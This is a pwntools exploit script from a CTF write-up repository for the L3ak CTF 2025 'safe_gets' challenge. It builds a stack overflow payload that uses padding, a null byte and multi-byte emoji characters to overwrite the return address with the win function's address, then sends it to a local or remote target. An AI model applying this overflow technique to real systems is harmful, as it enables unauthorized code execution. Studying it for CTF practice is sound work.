furtest/furtest.fr
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3fe9653417109e99a1dfd560fcc80a25ff8077f
furtest.fr/content/writeups/2025/l3ak_ctf/pwn/safe_gets/exploit.py
furtest 7df580044e Adds l3ak ctf 2025
2025-07-14 09:27:19 +02:00

54 lines
1.5 KiB
Python
Executable File
Raw Blame History

#!/usr/bin/python3
from pwn import *
# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
exe = local_exe
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
elif args.SSH:
exe = remote_exe
s=ssh(host='HOST',user='LOGIN',password='PASSWORD',port=0000)
return s.process([exe] + argv)
else: # Run locally
exe = local_exe
return process([exe] + argv, *a, **kw)
# Specify your GDB script here for debugging
gdbscript = '''
break main
break *main+202
'''.format(**locals())
# USE ./filename otherwise gdb will not work
local_exe = './chall'
remote_exe = 'REMOTE'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(local_exe, checksec=False)
# Change logging level to help with debugging (error/warning/info/debug)
#context.log_level = 'debug'
context.log_level = 'info'
# ===========================================================
# EXPLOIT GOES HERE
# ===========================================================
io = start()
payload = flat(
b"A"*74,
b"\x00",
"😄".encode("utf-8")*50,
b"A"*5,
pack((elf.symbols.win)+5)
)
write("payload", payload)
io.sendlineafter(b"Enter your input (max 255 bytes): ", payload)
# Receive the flag
io.interactive()
Reference in New Issue View Git Blame Copy Permalink